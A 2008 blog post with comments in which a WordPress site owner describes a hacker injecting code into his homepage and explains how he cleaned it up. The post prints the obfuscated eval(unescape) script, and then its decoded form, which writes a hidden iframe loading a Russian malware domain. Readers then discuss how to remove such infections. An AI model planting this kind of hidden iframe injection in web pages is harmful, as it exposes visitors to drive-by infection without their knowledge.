HTML/Framer.Z Virus in WordPress
Woohoo! I just love it when someone hacks my website and installs a virus. Here’s a nice little flag that AVG gave me:
Fortunately, an upgrade from WordPress 2.2 to 2.5 and a little cleanup of the html on the homepage did the trick. This is what some hacker installed on my root index.htm file (commented just in case):
<!– <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%35%34%37%31%29%2b%27%38%30%35%34%61%38%65%32%65%5c%27%20%77%69%64%74%68%3d%36%36%37%20%68%65%69%67%68%74%3d%34%31%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> –>
And when this code is ‘unescaped’ it translates into:
<!– ("window.status=’Done’;document.write(’<iframe name=4 src=\’http://traffurl.ru/sliv?’+Math.round(Math.random()*275471)+’8054a8e2e\’ width=667 height=413 style=\’display: none\’></iframe>’) –>
I did a whois search on this Russian domain, but didn’t find any results. Thank you hackers for showing the love.
July 4th, 2008 at 10:59 pm
Trent,
It is good you detected the “lovely hacker”. It was very frustraiting for me
everytime I wanted to open your blog and my compueter’s secutiry awarned me that it had virus.
July 19th, 2008 at 6:45 am
This html framer.z came up on my AVG virus program too. It’s in the AVG virus vault right now. I don’t see anything on AVG I can use to delete it from my PC. I’m not that experienced to be able to get this framer.z off my PC. I looked on the Norton web site for a program to remove it but didn’t find anything. Can anyone offer some help please?
August 14th, 2008 at 10:28 am
what do you do if they have infected your whole site like they did mine? I have a huge site
August 15th, 2008 at 8:08 pm
You might want to do a global search/replace on your website to get rid of it. It will probably be similar code to the example I posted above. I’d first identify the exact code, then determine if it’s exactly the same across all your infected pages- it likely is. Then if your site is actual separate html files, I’d use something like Dreamweaver to do a find/replace to remove it. You can set Dreamweaver to remove all files that contain *code* within a specified folder. If your site is dynamic (database driven), I’d do a search/replace in your mysql database or whatever you’re using.
September 1st, 2008 at 5:06 am
I’t infected my site to.
but i can’t open the htm and php files and search the code!?
( avg not running )
How can i open/edit the infected files?
September 1st, 2008 at 12:00 pm
You probably had some kind of antivirus program tell you your site was infected. So, whatever page URL you were on at the time you saw the antivirus message is the page you want to first examine.
Use an FTP program to download your htm/php file and repair it or just upload and replace the infected file with a clean version of the htm/php file, if you have it stored somewhere on your computer.
If you try to repair, after you download the infected file, open in Dreamweaver or something that allows you to search the code. You won’t get a virus by opening up the file in a html editor, but only by viewing/previewing in a browser. If you don’t have a html editor, you can also rename your file extensions from .php to .txt and open in Notepad and also find/replace that way too. Just look for funky looking code like in the example listed above on this page.
Good luck!